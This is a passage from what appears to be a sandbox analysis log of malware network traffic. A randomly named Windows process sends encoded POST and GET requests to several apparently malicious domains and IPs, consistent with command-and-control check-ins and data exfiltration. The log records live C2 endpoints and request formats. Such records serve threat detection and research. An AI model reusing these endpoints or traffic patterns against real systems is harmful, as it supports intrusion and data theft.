                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.44756.pizza/a59t/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:32.361994982 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:32 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.4 | 50004 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:34.012120962 CET | 466 | OUT | GET /a59t/?1V=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.44756.pizza
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:34.898797035 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:34 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.4 | 50015 | 199.192.21.169 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:39.979723930 CET | 737 | OUT | POST /bowc/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.lonfor.website
                                                                    Origin: http://www.lonfor.website
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lonfor.website/bowc/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAO77wQHjbXxZGevPe+AW0mbHqrgwSWEH6fQ==
                                                                    Jan 3, 2025 11:40:40.572974920 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:40 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.2.4 | 50016 | 199.192.21.169 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:42.533444881 CET | 757 | OUT | POST /bowc/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.lonfor.website
                                                                    Origin: http://www.lonfor.website
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lonfor.website/bowc/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bjZ2n5mbH6zEXlJGMY+kH3vNI14OonmSB0=
                                                                    Jan 3, 2025 11:40:43.112173080 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:43 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    15 | 192.168.2.4 | 50017 | 199.192.21.169 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:45.086481094 CET | 10839 | OUT | POST /bowc/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.lonfor.website
                                                                    Origin: http://www.lonfor.website
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lonfor.website/bowc/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:45.761290073 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:45 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    16 | 192.168.2.4 | 50018 | 199.192.21.169 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:47.630450010 CET | 469 | OUT | GET /bowc/?w0DDw=KH0hz6&1V=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.lonfor.website
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:48.229320049 CET | 933 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:48 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    17 | 192.168.2.4 | 50019 | 154.197.162.239 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:53.638443947 CET | 743 | OUT | POST /cf9p/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.investshares.net
                                                                    Origin: http://www.investshares.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.investshares.net/cf9p/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:54.204783916 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:17 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    18 | 192.168.2.4 | 50020 | 154.197.162.239 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:56.218512058 CET | 763 | OUT | POST /cf9p/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.investshares.net
                                                                    Origin: http://www.investshares.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.investshares.net/cf9p/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:56.792736053 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:20 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    19 | 192.168.2.4 | 50021 | 154.197.162.239 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:58.798161983 CET | 10845 | OUT | POST /cf9p/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.investshares.net
                                                                    Origin: http://www.investshares.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.investshares.net/cf9p/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:59.463119984 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    20 | 192.168.2.4 | 50022 | 154.197.162.239 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:01.339726925 CET | 471 | OUT | GET /cf9p/?1V=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.investshares.net
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:01.916667938 CET | 141 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:25 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    21 | 192.168.2.4 | 50023 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:07.012845039 CET | 752 | OUT | POST /hqr6/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.nosolofichas.online
                                                                    Origin: http://www.nosolofichas.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.nosolofichas.online/hqr6/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    22 | 192.168.2.4 | 50024 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:09.568043947 CET | 772 | OUT | POST /hqr6/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.nosolofichas.online
                                                                    Origin: http://www.nosolofichas.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.nosolofichas.online/hqr6/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    23 | 192.168.2.4 | 50025 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:12.116695881 CET | 10854 | OUT | POST /hqr6/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.nosolofichas.online
                                                                    Origin: http://www.nosolofichas.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.nosolofichas.online/hqr6/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    24 | 192.168.2.4 | 50026 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:14.652565956 CET | 474 | OUT | GET /hqr6/?1V=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.nosolofichas.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:15.122035980 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 03 Jan 2025 10:41:15 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 19804dc9110f0bccc1258c7361fa5602-bos-edge1
                                                                    Expires: Fri, 03 Jan 2025 10:41:14 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.2.4 | 50027 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:20.609915972 CET | 755 | OUT | POST /jpjz/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Origin: http://www.jrcov55qgcxp5fwa.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdth4issjFlYNC01RDFUq8uPRuHBuE4z7DfQ==
                                                                    Jan 3, 2025 11:41:21.487103939 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:21 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.2.4 | 50028 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:23.169585943 CET | 775 | OUT | POST /jpjz/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Origin: http://www.jrcov55qgcxp5fwa.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P1daGnw1wGKEbDe4B/UXRsA2NokpALPBnE=
                                                                    Jan 3, 2025 11:41:24.040982962 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:23 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.4 | 50029 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:25.737158060 CET | 10857 | OUT | POST /jpjz/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Origin: http://www.jrcov55qgcxp5fwa.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:26.595901966 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:41:26 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.4 | 50030 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:28.286664963 CET | 475 | OUT | GET /jpjz/?1V=BsCB6j6XIP/wuAbzMvYD7rFnMTUj3QEoDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVAurUdDQdDmms6nVhCqDqAG2cNeT9xHcOvE=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.jrcov55qgcxp5fwa.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:29.157627106 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 146
                                                                    Content-Type: text/html
